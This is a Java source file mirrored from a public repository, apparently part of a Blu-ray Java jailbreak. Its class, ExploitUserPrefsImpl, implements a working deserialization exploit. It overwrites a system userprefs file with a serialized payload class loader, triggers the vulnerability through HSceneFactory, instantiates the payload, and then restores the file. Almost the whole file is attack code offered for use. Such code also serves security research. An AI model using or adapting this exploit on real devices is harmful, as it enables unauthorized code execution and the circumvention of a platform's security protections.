mirror of
https://github.com/TheOfficialFloW/bd-jb
synced 2025-01-09 12:38:00 -05:00
57 lines
1.7 KiB
Java
57 lines
1.7 KiB
Java
/*
|
|
* Copyright (C) 2021 Andy Nguyen
|
|
*
|
|
* This software may be modified and distributed under the terms
|
|
* of the MIT license. See the LICENSE file for details.
|
|
*/
|
|
|
|
package com.bdjb;
|
|
|
|
import java.io.FileOutputStream;
|
|
import java.io.InputStream;
|
|
import java.io.ObjectOutputStream;
|
|
import java.io.OutputStream;
|
|
import org.havi.ui.HSceneFactory;
|
|
|
|
/** Implementation of the userprefs deserialization exploit. */
|
|
class ExploitUserPrefsImpl implements ExploitInterface {
|
|
private static final String MNT_ADA_USERPREFS = "/OS/HDD/download0/mnt_ada/userprefs";
|
|
|
|
private static final String PAYLOAD_CLASS_LOADER_SER = "/com/bdjb/PayloadClassLoader.ser";
|
|
|
|
public void trigger() throws Exception {
|
|
try {
|
|
// Overwrite userprefs with a serialized PayloadClassLoader.
|
|
InputStream inputStream = getClass().getResourceAsStream(PAYLOAD_CLASS_LOADER_SER);
|
|
OutputStream outputStream = new FileOutputStream(MNT_ADA_USERPREFS);
|
|
|
|
byte[] buf = new byte[8192];
|
|
int read;
|
|
while ((read = inputStream.read(buf)) > 0) {
|
|
outputStream.write(buf, 0, read);
|
|
}
|
|
|
|
outputStream.close();
|
|
inputStream.close();
|
|
|
|
// Trigger deserialization vulnerability.
|
|
try {
|
|
HSceneFactory.getInstance().getDefaultHScene();
|
|
} catch (ClassCastException e) {
|
|
// Exception expected.
|
|
|
|
// Instantiate the payload class.
|
|
PayloadClassLoader.getInstance().newPayload();
|
|
}
|
|
} finally {
|
|
// Restore userprefs file.
|
|
String[][] preferences = new String[9][];
|
|
preferences[3] = new String[] {"26"};
|
|
ObjectOutputStream outputStream =
|
|
new ObjectOutputStream(new FileOutputStream(MNT_ADA_USERPREFS));
|
|
outputStream.writeObject(preferences);
|
|
outputStream.close();
|
|
}
|
|
}
|
|
}
|